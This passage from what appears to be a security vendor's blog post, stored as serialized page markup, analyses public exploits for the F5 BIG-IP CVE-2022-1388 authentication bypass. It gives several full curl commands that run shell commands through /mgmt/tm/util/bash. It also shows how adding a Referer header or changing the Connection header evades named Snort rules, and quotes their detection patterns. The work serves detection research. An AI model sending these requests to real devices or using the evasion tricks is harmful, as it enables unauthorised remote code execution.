42\n",[886,101561,101562,101627,101637,101644,101650,101662,101669,101676,101683,101695],{"__ignoreMap":219},[1373,101563,101564,101566,101568,101570,101572,101575,101577,101579,101581,101584,101586,101588,101590,101593,101595,101597,101599,101602,101604,101606,101608,101611,101613,101615,101617,101620,101622,101625],{"class":1375,"line":1376},[1373,101565,1557],{"class":2206},[1373,101567,82377],{"class":2209},[1373,101569,82380],{"class":2209},[1373,101571,4713],{"class":1387},[1373,101573,101574],{"class":1391},"Content-Type: application\u002Fjson",[1373,101576,1388],{"class":1387},[1373,101578,82380],{"class":2209},[1373,101580,4883],{"class":1387},[1373,101582,101583],{"class":1391},"Host: 127.0.0.1",[1373,101585,183],{"class":1387},[1373,101587,82380],{"class":2209},[1373,101589,4713],{"class":1387},[1373,101591,101592],{"class":1391},"Connection: X-F5-Auth-Token",[1373,101594,1388],{"class":1387},[1373,101596,82380],{"class":2209},[1373,101598,4713],{"class":1387},[1373,101600,101601],{"class":1391},"X-F5-Auth-Token: authtoken",[1373,101603,1388],{"class":1387},[1373,101605,82380],{"class":2209},[1373,101607,4713],{"class":1387},[1373,101609,101610],{"class":1391},"Authorization: Basic YWRtaW468J+mng==",[1373,101612,1388],{"class":1387},[1373,101614,87473],{"class":2209},[1373,101616,4713],{"class":1387},[1373,101618,101619],{"class":1391},"{\"command\": \"run\", \"utilCmdArgs\": \"-c id\"}",[1373,101621,1388],{"class":1387},[1373,101623,101624],{"class":1391}," https:\u002F\u002F10.9.49.191\u002Fmgmt\u002Ftm\u002Futil\u002Fbash",[1373,101626,4912],{"class":1383},[1373,101628,101629,101631,101633,101635],{"class":1375,"line":220},[1373,101630,5384],{"class":1397},[1373,101632,76355],{"class":2206},[1373,101634,100878],{"class":1391},[1373,101636,35589],{"class":1391},[1373,101638,101639,101641],{"class":1375,"line":1266},[1373,101640,5384],{"class":1397},[1373,101642,101643],{"class":4640}," Host: 127.0.0.1\n",[1373,101645,101646,101648],{"class":1375,"line":1852},[1373,101647,5384],{"class":1397},[1373,101649,35603],{"class":4640},[1373,101651,101652,101654,101656,101658,101660],{"class":1375,"line":4692},[1373,101653,5384],{"class":1397},[1373,101655,35610],{"class":4640},[1373,101657,35613],{"class":1397},[1373,101659,2180],{"class":4640},[1373,101661,35618],{"class":1397},[1373,101663,101664,101666],{"class":1375,"line":4724},[1373,101665,5384],{"class":1397},[1373,101667,101668],{"class":4640}," Content-Type: application\u002Fjson\n",[1373,101670,101671,101673],{"class":1375,"line":4756},[1373,101672,5384],{"class":1397},[1373,101674,101675],{"class":4640}," Connection: X-F5-Auth-Token\n",[1373,101677,101678,101680],{"class":1375,"line":4768},[1373,101679,5384],{"class":1397},[1373,101681,101682],{"class":4640}," X-F5-Auth-Token: authtoken\n",[1373,101684,101685,101687,101690,101692],{"class":1375,"line":4792},[1373,101686,5384],{"class":1397},[1373,101688,101689],{"class":4640}," Authorization: Basic YWRtaW468J+mng",[1373,101691,5417],{"class":1397},[1373,101693,101694],{"class":1391},"=\n",[1373,101696,101697,101699],{"class":1375,"line":4798},[1373,101698,5384],{"class":1397},[1373,101700,101701],{"class":4640}," Content-Length: 42\n",[18,101703,101704],{},"Horizon3.ai was (and is, in our eyes) the authoritative source on this vulnerability, so it’s unsurprising to see most GitHub exploits follow this pattern. However, there were a couple of notable subvariants of this approach.",[1789,101706,101707,101716],{},[25,101708,101709,101710,39227,101713,101715],{},"Exploits that used ",[886,101711,101712],{},"Host: localhost",[886,101714,101583],{},". While not actually included in this analysis, the Metasploit module for CVE-2022-1388 falls into this camp. Presumably, an alphanumeric Host field is less suspicious than a non-routable IP.",[25,101717,101718,101719,1554,101722,101725,101726,101728],{},"Exploits using ",[886,101720,101721],{},"Connection: close, X-F5-Auth-Token",[886,101723,101724],{},"Connection: keep-alive, X-F5-Authtoken"," instead of just ",[886,101727,101592],{},". We’re unsure what drove this innovation as none of the cited Snort rules are tripped up by this variation. More than a few exploits used this approach, so we assume it’s done to satisfy a WAF requirement.",[18,101730,101731,101732,101735,101736,101740],{},"It’s interesting to note that Emerging Threats Snort 2.9 Rule 2036556 does not detect the original variation, but it will detect the ",[886,101733,101734],{},"Connection: xxxx, X-F5-Auth-Token"," sub-variant (which means it’ll catch Metasploit and ",[47,101737,22175],{"href":101738,"rel":101739},"https:\u002F\u002Fgithub.com\u002Fprojectdiscovery\u002Fnuclei-templates\u002Fblob\u002F5ffdd65882c35919828210c82321015be6bc439f\u002Fcves\u002F2022\u002FCVE-2022-1388.yaml#L46",[51],"). The error in 2036556 is a slight mistake in the following regular expression:",[1354,101742,101744],{"className":100977,"code":101743,"language":100979,"meta":219,"style":219},"pcre:\"\u002F^Connection\\x3a\\x20[^\\r\\n]+x-F5-Auth-Token\u002FHmi\"; \\\n",[886,101745,101746],{"__ignoreMap":219},[1373,101747,101748,101751,101753,101755,101757,101759,101761,101763,101765,101767,101769],{"class":1375,"line":1376},[1373,101749,101750],{"class":4640},"pcre",[1373,101752,4606],{"class":1383},[1373,101754,183],{"class":1387},[1373,101756,101130],{"class":1391},[1373,101758,101133],{"class":2326},[1373,101760,101136],{"class":1391},[1373,101762,15491],{"class":2326},[1373,101764,101141],{"class":1391},[1373,101766,183],{"class":1387},[1373,101768,101020],{"class":4640},[1373,101770,99089],{"class":1383},[18,101772,101773,101774,101777,101778,101780,101781,101783,101784,101786],{},"The character class ",[886,101775,101776],{},"[^\\r\\n]+"," consumes the first ",[886,101779,29765],{}," when the ",[886,101782,6331],{}," header only contains ",[886,101785,101549],{},". Snort 2.9 Community Rule 59735 has a more accurate version of this regular expression:",[1354,101788,101790],{"className":100977,"code":101789,"language":100979,"meta":219,"style":219},"pcre:\"\u002F^Connection:[^\\r\\n]*?X-F5-Auth\u002FHim\";\n",[886,101791,101792],{"__ignoreMap":219},[1373,101793,101794,101796,101798,101800,101802,101804,101806,101808],{"class":1375,"line":1376},[1373,101795,101750],{"class":4640},[1373,101797,4606],{"class":1383},[1373,101799,183],{"class":1387},[1373,101801,101451],{"class":1391},[1373,101803,15491],{"class":2326},[1373,101805,101456],{"class":1391},[1373,101807,183],{"class":1387},[1373,101809,4912],{"class":28571},[18,101811,101812],{},"Just like that, we already have an interesting tidbit of knowledge. The signature does detect two of the biggest sources for exploitation (Metasploit and Nuclei) , but now we know we can craft a payload that it doesn’t detect. The other two Snort rules remain problematic however, so let’s move on to the other exploit variants.",[993,101814,101816],{"id":101815},"_2-the-x-forwarded-host-variant","2. The X-Forwarded-Host Variant",[18,101818,2245,101819,10515,101822,101827,101828,1554,101830,101832,101833,101835,101836,101838],{},[886,101820,101821],{},"X-Forwarded-Host",[47,101823,101826],{"href":101824,"rel":101825},"https:\u002F\u002Fraw.githubusercontent.com\u002Fjbharucha05\u002FCVE-2022-1388\u002Fmain\u002FCVE-2022-1388.sh",[51],"variant"," was suggested by Horizon3.ai in their technical write-up, but they didn’t use this approach in their published exploits. An exploit for CVE-2022-1388 doesn’t need to use ",[886,101829,101712],{},[886,101831,101583],{}," if the ",[886,101834,6331],{}," header contains ",[886,101837,101821],{},". Another example:",[1354,101840,101842],{"className":31740,"code":101841,"language":2186,"meta":219,"style":219},"curl -kv -H 'Content-Type: application\u002Fjson' -H 'Connection: X-F5-Auth-Token, X-Forwarded-Host' -H 'X-F5-Auth-Token: authtoken' -H 'Authorization: Basic YWRtaW468J+mng==' -d '{\"command\": \"run\", \"utilCmdArgs\": \"-c id\"}' https:\u002F\u002F10.9.49.191\u002Fmgmt\u002Ftm\u002Futil\u002Fbash;\n> POST \u002Fmgmt\u002Ftm\u002Futil\u002Fbash HTTP\u002F1.1\n> Host: 10.9.49.191\n> User-Agent: curl\u002F7.68.0\n> Accept: *\u002F*\n> Content-Type: application\u002Fjson\n> Connection: X-F5-Auth-Token, X-Forwarded-Host\n> X-F5-Auth-Token: authtoken\n> Authorization: Basic YWRtaW468J+mng==\n> Content-Length: 42\n",[886,101843,101844,101895,101905,101912,101918,101930,101936,101943,101949,101959],{"__ignoreMap":219},[1373,101845,101846,101848,101850,101852,101854,101856,101858,101860,101862,101865,101867,101869,101871,101873,101875,101877,101879,101881,101883,101885,101887,101889,101891,101893],{"class":1375,"line":1376},[1373,101847,1557],{"class":2206},[1373,101849,82377],{"class":2209},[1373,101851,82380],{"class":2209},[1373,101853,4713],{"class":1387},[1373,101855,101574],{"class":1391},[1373,101857,1388],{"class":1387},[1373,101859,82380],{"class":2209},[1373,101861,4713],{"class":1387},[1373,101863,101864],{"class":1391},"Connection: X-F5-Auth-Token, X-Forwarded-Host",[1373,101866,1388],{"class":1387},[1373,101868,82380],{"class":2209},[1373,101870,4713],{"class":1387},[1373,101872,101601],{"class":1391},[1373,101874,1388],{"class":1387},[1373,101876,82380],{"class":2209},[1373,101878,4713],{"class":1387},[1373,101880,101610],{"class":1391},[1373,101882,1388],{"class":1387},[1373,101884,87473],{"class":2209},[1373,101886,4713],{"class":1387},[1373,101888,101619],{"class":1391},[1373,101890,1388],{"class":1387},[1373,101892,101624],{"class":1391},[1373,101894,4912],{"class":1383},[1373,101896,101897,101899,101901,101903],{"class":1375,"line":220},[1373,101898,5384],{"class":1397},[1373,101900,76355],{"class":2206},[1373,101902,100878],{"class":1391},[1373,101904,35589],{"class":1391},[1373,101906,101907,101909],{"class":1375,"line":1266},[1373,101908,5384],{"class":1397},[1373,101910,101911],{"class":4640}," Host: 10.9.49.191\n",[1373,101913,101914,101916],{"class":1375,"line":1852},[1373,101915,5384],{"class":1397},[1373,101917,35603],{"class":4640},[1373,101919,101920,101922,101924,101926,101928],{"class":1375,"line":4692},[1373,101921,5384],{"class":1397},[1373,101923,35610],{"class":4640},[1373,101925,35613],{"class":1397},[1373,101927,2180],{"class":4640},[1373,101929,35618],{"class":1397},[1373,101931,101932,101934],{"class":1375,"line":4724},[1373,101933,5384],{"class":1397},[1373,101935,101668],{"class":4640},[1373,101937,101938,101940],{"class":1375,"line":4756},[1373,101939,5384],{"class":1397},[1373,101941,101942],{"class":4640}," Connection: X-F5-Auth-Token, X-Forwarded-Host\n",[1373,101944,101945,101947],{"class":1375,"line":4768},[1373,101946,5384],{"class":1397},[1373,101948,101682],{"class":4640},[1373,101950,101951,101953,101955,101957],{"class":1375,"line":4792},[1373,101952,5384],{"class":1397},[1373,101954,101689],{"class":4640},[1373,101956,5417],{"class":1397},[1373,101958,101694],{"class":1391},[1373,101960,101961,101963],{"class":1375,"line":4798},[1373,101962,5384],{"class":1397},[1373,101964,101701],{"class":4640},[18,101966,101967,101968,101970,101971,101973],{},"As suggested previously, a ",[886,101969,6301],{}," field that doesn’t match the actual target is really suspicious, so this is likely a smarter variant to use in the wild. However, none of the three Snort rules concern themselves with the ",[886,101972,6301],{}," header. Apparently, their authors also read the Horizon3.ai write-up. So, while this variant is smart, it’s not good enough. Let’s see the next variant.",[993,101975,101977],{"id":101976},"_3-the-kind-of-works-variant","3. The “Kind of Works” Variant",[18,101979,101980,101981,101985,101986,1554,101988,10515,101990,101992,101993,101995,101996,101998],{},"There are quite a few ",[47,101982,25091],{"href":101983,"rel":101984},"https:\u002F\u002Fraw.githubusercontent.com\u002Falt3kx\u002FCVE-2022-1388_PoC\u002Fmain\u002FREADME.md",[51]," that don’t have the required ",[886,101987,101583],{},[886,101989,101712],{},[295,101991,297],{}," they don’t use the ",[886,101994,101821],{}," value in the ",[886,101997,6331],{}," header. They effectively look like this:",[1354,102000,102002],{"className":31740,"code":102001,"language":2186,"meta":219,"style":219},"curl -kv -H 'Content-Type: application\u002Fjson' -H 'Connection: X-F5-Auth-Token' -H 'X-F5-Auth-Token: authtoken' -H 'Authorization: Basic YWRtaW468J+mng==' -d '{\"command\": \"run\", \"utilCmdArgs\": \"-c id\"}' https:\u002F\u002F10.9.49.191\u002Fmgmt\u002Ftm\u002Futil\u002Fbash;\n> POST \u002Fmgmt\u002Ftm\u002Futil\u002Fbash HTTP\u002F1.1\n> Host: 10.9.49.191\n> User-Agent: curl\u002F7.68.0\n> Accept: *\u002F*\n> Content-Type: application\u002Fjson\n> Connection: X-F5-Auth-Token\n> X-F5-Auth-Token: authtoken\n> Authorization: Basic YWRtaW468J+mng==\n> Content-Length: 42\n",[886,102003,102004,102054,102064,102070,102076,102088,102094,102100,102106,102116],{"__ignoreMap":219},[1373,102005,102006,102008,102010,102012,102014,102016,102018,102020,102022,102024,102026,102028,102030,102032,102034,102036,102038,102040,102042,102044,102046,102048,102050,102052],{"class":1375,"line":1376},[1373,102007,1557],{"class":2206},[1373,102009,82377],{"class":2209},[1373,102011,82380],{"class":2209},[1373,102013,4713],{"class":1387},[1373,102015,101574],{"class":1391},[1373,102017,1388],{"class":1387},[1373,102019,82380],{"class":2209},[1373,102021,4713],{"class":1387},[1373,102023,101592],{"class":1391},[1373,102025,1388],{"class":1387},[1373,102027,82380],{"class":2209},[1373,102029,4713],{"class":1387},[1373,102031,101601],{"class":1391},[1373,102033,1388],{"class":1387},[1373,102035,82380],{"class":2209},[1373,102037,4713],{"class":1387},[1373,102039,101610],{"class":1391},[1373,102041,1388],{"class":1387},[1373,102043,87473],{"class":2209},[1373,102045,4713],{"class":1387},[1373,102047,101619],{"class":1391},[1373,102049,1388],{"class":1387},[1373,102051,101624],{"class":1391},[1373,102053,4912],{"class":1383},[1373,102055,102056,102058,102060,102062],{"class":1375,"line":220},[1373,102057,5384],{"class":1397},[1373,102059,76355],{"class":2206},[1373,102061,100878],{"class":1391},[1373,102063,35589],{"class":1391},[1373,102065,102066,102068],{"class":1375,"line":1266},[1373,102067,5384],{"class":1397},[1373,102069,101911],{"class":4640},[1373,102071,102072,102074],{"class":1375,"line":1852},[1373,102073,5384],{"class":1397},[1373,102075,35603],{"class":4640},[1373,102077,102078,102080,102082,102084,102086],{"class":1375,"line":4692},[1373,102079,5384],{"class":1397},[1373,102081,35610],{"class":4640},[1373,102083,35613],{"class":1397},[1373,102085,2180],{"class":4640},[1373,102087,35618],{"class":1397},[1373,102089,102090,102092],{"class":1375,"line":4724},[1373,102091,5384],{"class":1397},[1373,102093,101668],{"class":4640},[1373,102095,102096,102098],{"class":1375,"line":4756},[1373,102097,5384],{"class":1397},[1373,102099,101675],{"class":4640},[1373,102101,102102,102104],{"class":1375,"line":4768},[1373,102103,5384],{"class":1397},[1373,102105,101682],{"class":4640},[1373,102107,102108,102110,102112,102114],{"class":1375,"line":4792},[1373,102109,5384],{"class":1397},[1373,102111,101689],{"class":4640},[1373,102113,5417],{"class":1397},[1373,102115,101694],{"class":1391},[1373,102117,102118,102120],{"class":1375,"line":4798},[1373,102119,5384],{"class":1397},[1373,102121,101701],{"class":4640},[18,102123,102124,102125,102129],{},"This variant doesn’t work on our test installation (BIG-IP version 16.1.2.1 - December 22, 2021), but many exploits on GitHub that follow this pattern. Originally, we assumed these exploits were broken, but we looked deeper given their volume. We couldn’t get our hands on an older installation, but we found this ",[47,102126,94167],{"href":102127,"rel":102128},"https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=bLYAzyBwIV4",[51]," demonstrating this variant working on a BIG-IP version from 2019. So, these exploits work, but only on old targets. They “kind of work.”",[18,102131,102132,102133,102135],{},"This is also our first real deviation from Horizon3.ai. Pretty interesting! How and why this variant became popular is a mystery. Perhaps a misunderstanding on the importance of the ",[886,102134,6301],{}," header. But it doesn’t matter too much, none of the three Snort rules are fooled by the missing values. So we forge ahead.",[993,102137,102139],{"id":102138},"_4-referer-variant","4. Referer Variant",[18,102141,2245,102142,102147,102148,102150,102151,102156],{},[47,102143,102146],{"href":102144,"rel":102145},"https:\u002F\u002Fraw.githubusercontent.com\u002Fnumanturle\u002FCVE-2022-1388\u002Fmain\u002Fbigip-icontrol-rest-rce.yaml",[51],"Referer Variant"," is only notable because it bypasses one of the Snort signatures. This variant is no different than the original Horizon3.ai variant except there’s an added ",[886,102149,9024],{}," HTTP Header. Again, it’s unclear what drove this innovation, but we guess that it’s related to a WAF ",[47,102152,102155],{"href":102153,"rel":102154},"https:\u002F\u002Fportswigger.net\u002Fweb-security\u002Fcsrf\u002Fbypassing-referer-based-defenses",[51],"CSRF validation",". On the wire, this variant looks like the following:",[1354,102158,102160],{"className":31740,"code":102159,"language":2186,"meta":219,"style":219},"curl -kv -H 'Content-Type: application\u002Fjson' -H \"Host: localhost\" -H \"Referer: https:\u002F\u002F10.9.49.191\u002F\" -H 'Connection: X-F5-Auth-Token' -H 'X-F5-Auth-Token: authtoken' -H 'Authorization: Basic YWRtaW468J+mng==' -d '{\"command\": \"run\", \"utilCmdArgs\": \"-c id\"}' https:\u002F\u002F10.9.49.191\u002Fmgmt\u002Ftm\u002Futil\u002Fbash;\n> POST \u002Fmgmt\u002Ftm\u002Futil\u002Fbash HTTP\u002F1.1\n> Host: localhost\n> User-Agent: curl\u002F7.68.0\n> Accept: *\u002F*\n> Content-Type: application\u002Fjson\n> Referer: https:\u002F\u002F10.9.49.191\u002F\n> Connection: X-F5-Auth-Token\n> X-F5-Auth-Token: authtoken\n> Authorization: Basic YWRtaW468J+mng==\n> Content-Length: 42\n",[886,102161,102162,102229,102239,102246,102252,102264,102270,102277,102283,102289,102299],{"__ignoreMap":219},[1373,102163,102164,102166,102168,102170,102172,102174,102176,102178,102180,102182,102184,102186,102188,102191,102193,102195,102197,102199,102201,102203,102205,102207,102209,102211,102213,102215,102217,102219,102221,102223,102225,102227],{"class":1375,"line":1376},[1373,102165,1557],{"class":2206},[1373,102167,82377],{"class":2209},[1373,102169,82380],{"class":2209},[1373,102171,4713],{"class":1387},[1373,102173,101574],{"class":1391},[1373,102175,1388],{"class":1387},[1373,102177,82380],{"class":2209},[1373,102179,4883],{"class":1387},[1373,102181,101712],{"class":1391},[1373,102183,183],{"class":1387},[1373,102185,82380],{"class":2209},[1373,102187,4883],{"class":1387},[1373,102189,102190],{"class":1391},"Referer: https:\u002F\u002F10.9.49.191\u002F",[1373,102192,183],{"class":1387},[1373,102194,82380],{"class":2209},[1373,102196,4713],{"class":1387},[1373,102198,101592],{"class":1391},[1373,102200,1388],{"class":1387},[1373,102202,82380],{"class":2209},[1373,102204,4713],{"class":1387},[1373,102206,101601],{"class":1391},[1373,102208,1388],{"class":1387},[1373,102210,82380],{"class":2209},[1373,102212,4713],{"class":1387},[1373,102214,101610],{"class":1391},[1373,102216,1388],{"class":1387},[1373,102218,87473],{"class":2209},[1373,102220,4713],{"class":1387},[1373,102222,101619],{"class":1391},[1373,102224,1388],{"class":1387},[1373,102226,101624],{"class":1391},[1373,102228,4912],{"class":1383},[1373,102230,102231,102233,102235,102237],{"class":1375,"line":220},[1373,102232,5384],{"class":1397},[1373,102234,76355],{"class":2206},[1373,102236,100878],{"class":1391},[1373,102238,35589],{"class":1391},[1373,102240,102241,102243],{"class":1375,"line":1266},[1373,102242,5384],{"class":1397},[1373,102244,102245],{"class":4640}," Host: localhost\n",[1373,102247,102248,102250],{"class":1375,"line":1852},[1373,102249,5384],{"class":1397},[1373,102251,35603],{"class":4640},[1373,102253,102254,102256,102258,102260,102262],{"class":1375,"line":4692},[1373,102255,5384],{"class":1397},[1373,102257,35610],{"class":4640},[1373,102259,35613],{"class":1397},[1373,102261,2180],{"class":4640},[1373,102263,35618],{"class":1397},[1373,102265,102266,102268],{"class":1375,"line":4724},[1373,102267,5384],{"class":1397},[1373,102269,101668],{"class":4640},[1373,102271,102272,102274],{"class":1375,"line":4756},[1373,102273,5384],{"class":1397},[1373,102275,102276],{"class":4640}," Referer: https:\u002F\u002F10.9.49.191\u002F\n",[1373,102278,102279,102281],{"class":1375,"line":4768},[1373,102280,5384],{"class":1397},[1373,102282,101675],{"class":4640},[1373,102284,102285,102287],{"class":1375,"line":4792},[1373,102286,5384],{"class":1397},[1373,102288,101682],{"class":4640},[1373,102290,102291,102293,102295,102297],{"class":1375,"line":4798},[1373,102292,5384],{"class":1397},[1373,102294,101689],{"class":4640},[1373,102296,5417],{"class":1397},[1373,102298,101694],{"class":1391},[1373,102300,102301,102303],{"class":1375,"line":4806},[1373,102302,5384],{"class":1397},[1373,102304,101701],{"class":4640},[18,102306,2245,102307,102309,102310,102312],{},[886,102308,9024],{}," header shouldn’t impact exploitation, but it’ll allow the attacker to bypass the Emerging Threats Snort 2.9 Rule 2036556. The detection was written to ignore any request containing a ",[886,102311,9024],{}," header.",[1354,102314,102316],{"className":100977,"code":102315,"language":100979,"meta":219,"style":219},"content:!\"Referer|3a 20|\"; http_header; \\\n",[886,102317,102318],{"__ignoreMap":219},[1373,102319,102320,102322,102324,102326,102328,102330,102332,102334],{"class":1375,"line":1376},[1373,102321,13389],{"class":4640},[1373,102323,4606],{"class":1383},[1373,102325,16090],{"class":4640},[1373,102327,183],{"class":1387},[1373,102329,101160],{"class":1391},[1373,102331,183],{"class":1387},[1373,102333,101098],{"class":4640},[1373,102335,99089],{"class":1383},[18,102337,102338,102339,102312],{},"Therefore, bypassing the rule is as simple as including an arbitrary ",[886,102340,9024],{},[18,102342,102343],{},"That concludes the variant analysis, and without any original thought whatsoever, we’ve bypassed the first of three Snort rules. But with more than 50 “unique” exploits, how can they all be distilled into four, frankly, very related variations? Let’s take a deeper look at how these exploits are related.",[61,102345,102347],{"id":102346},"comparing-github-exploits-with-ssdeep","Comparing GitHub Exploits with SSDeep",[18,102349,102350,102351,102354,102355,102360],{},"When VulnCheck indexes exploits from GitHub we also store a direct link to the raw exploit code (when possible). For example, the raw link to Horizon3.ai’s exploit code is ",[47,102352,101535],{"href":101535,"rel":102353},[51],". With the raw links readily available, it’s an easy task to apply ",[47,102356,102359],{"href":102357,"rel":102358},"https:\u002F\u002Fssdeep-project.github.io\u002Fssdeep\u002Findex.html",[51],"ssdeep"," to each exploit in order to determine which share code.",[18,102362,102363,102365,102366,102368],{},[886,102364,102359],{},", for those unfamiliar, is a tool that computes a fuzzy hash over a given file. A standard hash, like sha-1 for example, can only tell us if two files are identical. A fuzzy hash can tell us if two files are similar. For example, ",[886,102367,102359],{}," computes the following hashes for these two exploits:",[307,102370,102371,102381],{},[310,102372,102373],{},[313,102374,102375,102378],{},[316,102376,102377],{},"Hash",[316,102379,102380],{},"File",[336,102382,102383,102393],{},[313,102384,102385,102388],{},[341,102386,102387],{},"24:ZCGacygxlWejJ9n3xYt8fHN5mWp1rOVL6L0zwC0syV:ZtJygDVjJ9n3xt\u002FN5LDOVL6LMWV",[341,102389,102390],{},[47,102391,101535],{"href":101535,"rel":102392},[51],[313,102394,102395,102398],{},[341,102396,102397],{},"24:ZCGacygxlWeCfn3xYt8fHN5mWp1rOVL6L0zwC0syv:ZtJygDVCfn3xt\u002FN5LDOVL6LMWv",[341,102399,102400],{},[47,102401,102402],{"href":102402,"rel":102403},"https:\u002F\u002Fraw.githubusercontent.com\u002Fpauloink\u002FCVE-2022-1388\u002Fmain\u002FCVE-2022-1388.py",[51],[18,102405,102406,102407,102409],{},"The computed hashes are (slightly) different, but ",[886,102408,102359],{}," can tell us that they are related (a score higher 0 indicates similarity):",[1354,102411,102413],{"className":11719,"code":102412,"language":11721,"meta":219,"style":219},"Python 3.8.10 (default, Mar 13 2023, 10:26:41)\n[GCC 9.4.0] on linux\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import ssdeep\n>>> ssdeep.compare(\"24:ZCGacygxlWejJ9n3xYt8fHN5mWp1rOVL6L0zwC0syV:ZtJygDVjJ9n3xt\u002FN5LDOVL6LMWV\", \"24:ZCGacygxlWeCfn3xYt8fHN5mWp1rOVL6L0zwC0syv:ZtJygDVCfn3xt\u002FN5LDOVL6LMWv\")\n93\n",[886,102414,102415,102456,102475,102520,102531,102561],{"__ignoreMap":219},[1373,102416,102417,102420,102423,102425,102427,102429,102431,102433,102436,102438,102441,102443,102445,102447,102449,102451,102454],{"class":1375,"line":1376},[1373,102418,102419],{"class":4640},"Python ",[1373,102421,102422],{"class":5467},"3.8",[1373,102424,59],{"class":1383},[1373,102426,24698],{"class":63570},[1373,102428,4641],{"class":1383},[1373,102430,18620],{"class":4640},[1373,102432,5437],{"class":1383},[1373,102434,102435],{"class":4640}," Mar ",[1373,102437,872],{"class":5467},[1373,102439,102440],{"class":5467}," 2023",[1373,102442,5437],{"class":1383},[1373,102444,39673],{"class":5467},[1373,102446,4606],{"class":1383},[1373,102448,745],{"class":5467},[1373,102450,4606],{"class":1383},[1373,102452,102453],{"class":5467},"41",[1373,102455,11875],{"class":1383},[1373,102457,102458,102460,102463,102466,102468,102470,102472],{"class":1375,"line":220},[1373,102459,7035],{"class":1383},[1373,102461,102462],{"class":2326},"GCC",[1373,102464,102465],{"class":5467}," 9.4",[1373,102467,59],{"class":1383},[1373,102469,445],{"class":63570},[1373,102471,15050],{"class":1383},[1373,102473,102474],{"class":4640}," on linux\n",[1373,102476,102477,102480,102482,102484,102486,102488,102490,102493,102495,102497,102499,102502,102504,102506,102508,102511,102513,102515,102518],{"class":1375,"line":1266},[1373,102478,102479],{"class":4640},"Type ",[1373,102481,183],{"class":1387},[1373,102483,39134],{"class":1391},[1373,102485,183],{"class":1387},[1373,102487,5437],{"class":1383},[1373,102489,4883],{"class":1387},[1373,102491,102492],{"class":1391},"copyright",[1373,102494,183],{"class":1387},[1373,102496,5437],{"class":1383},[1373,102498,4883],{"class":1387},[1373,102500,102501],{"class":1391},"credits",[1373,102503,183],{"class":1387},[1373,102505,57252],{"class":1397},[1373,102507,4883],{"class":1387},[1373,102509,102510],{"class":1391},"license",[1373,102512,183],{"class":1387},[1373,102514,55807],{"class":4636},[1373,102516,102517],{"class":4640}," more information",[1373,102519,55527],{"class":1383},[1373,102521,102522,102525,102528],{"class":1375,"line":1852},[1373,102523,102524],{"class":1397},">>>",[1373,102526,102527],{"class":4636}," import",[1373,102529,102530],{"class":4640}," ssdeep\n",[1373,102532,102533,102535,102538,102540,102543,102545,102547,102549,102551,102553,102555,102557,102559],{"class":1375,"line":4692},[1373,102534,102524],{"class":1397},[1373,102536,102537],{"class":4640}," ssdeep",[1373,102539,59],{"class":1383},[1373,102541,102542],{"class":11735},"compare",[1373,102544,1384],{"class":1383},[1373,102546,183],{"class":1387},[1373,102548,102387],{"class":1391},[1373,102550,183],{"class":1387},[1373,102552,5437],{"class":1383},[1373,102554,4883],{"class":1387},[1373,102556,102397],{"class":1391},[1373,102558,183],{"class":1387},[1373,102560,11875],{"class":1383},[1373,102562,102563],{"class":1375,"line":4724},[1373,102564,102565],{"class":5467},"93\n",[18,102567,102568],{},"Diffing these exploits, we see that they are very similar indeed.",[1354,102570,102572],{"className":99957,"code":102571,"language":11815,"meta":219,"style":219},"diff -u CVE-2022-1388.py CVE-2022-1388.py.1\n--- CVE-2022-1388.py 2023-04-11 14:45:01.329298751 -0400\n+++ CVE-2022-1388.py.1 2023-04-11 14:45:12.225289447 -0400\n@@ -8,7 +8,7 @@\n url = f'https:\u002F\u002F{target}\u002Fmgmt\u002Ftm\u002Futil\u002Fbash'\n headers = {\n 'Host': '127.0.0.1',\n- 'Authorization': 'Basic YWRtaW46aG9yaXpvbjM=',\n+ 'Authorization': 'Basic YWRtaW46YW55dGhpbmc=',\n 'X-F5-Auth-Token': 'asdf', \n 'Connection': 'X-F5-Auth-Token',\n 'Content-Type': 'application\u002Fjson'\n@@ -28,6 +28,4 @@\n parser.add_argument('-c', '--command', help='The command to execute')\n args = parser.parse_args()\n \n- exploit(args.target, args.command)\n-\n-\n+ exploit(args.target, args.command)\n",[886,102573,102574,102579,102584,102589,102594,102599,102604,102609,102614,102619,102624,102629,102634,102639,102644,102649,102653,102658,102663,102667],{"__ignoreMap":219},[1373,102575,102576],{"class":1375,"line":1376},[1373,102577,102578],{},"diff -u CVE-2022-1388.py CVE-2022-1388.py.1\n",[1373,102580,102581],{"class":1375,"line":220},[1373,102582,102583],{},"--- CVE-2022-1388.py 2023-04-11 14:45:01.329298751 -0400\n",[1373,102585,102586],{"class":1375,"line":1266},[1373,102587,102588],{},"+++ CVE-2022-1388.py.1 2023-04-11 14:45:12.225289447 -0400\n",[1373,102590,102591],{"class":1375,"line":1852},[1373,102592,102593],{},"@@ -8,7 +8,7 @@\n",[1373,102595,102596],{"class":1375,"line":4692},[1373,102597,102598],{}," url = f'https:\u002F\u002F{target}\u002Fmgmt\u002Ftm\u002Futil\u002Fbash'\n",[1373,102600,102601],{"class":1375,"line":4724},[1373,102602,102603],{}," headers = {\n",[1373,102605,102606],{"class":1375,"line":4756},[1373,102607,102608],{}," 'Host': '127.0.0.1',\n",[1373,102610,102611],{"class":1375,"line":4768},[1373,102612,102613],{},"- 'Authorization': 'Basic YWRtaW46aG9yaXpvbjM=',\n",[1373,102615,102616],{"class":1375,"line":4792},[1373,102617,102618],{},"+ 'Authorization': 'Basic YWRtaW46YW55dGhpbmc=',\n",[1373,102620,102621],{"class":1375,"line":4798},[1373,102622,102623],{}," 'X-F5-Auth-Token': 'asdf', \n",[1373,102625,102626],{"class":1375,"line":4806},[1373,102627,102628],{}," 'Connection': 'X-F5-Auth-Token',\n",[1373,102630,102631],{"class":1375,"line":4817},[1373,102632,102633],{}," 'Content-Type': 'application\u002Fjson'\n",[1373,102635,102636],{"class":1375,"line":4825},[1373,102637,102638],{},"@@ -28,6 +28,4 @@\n",[1373,102640,102641],{"class":1375,"line":4835},[1373,102642,102643],{}," parser.add_argument('-c', '--command', help='The command to execute')\n",[1373,102645,102646],{"class":1375,"line":4843},[1373,102647,102648],{}," args = parser.parse_args()\n",[1373,102650,102651],{"class":1375,"line":4849},[1373,102652,19298],{},[1373,102654,102655],{"class":1375,"line":4877},[1373,102656,102657],{},"- exploit(args.target, 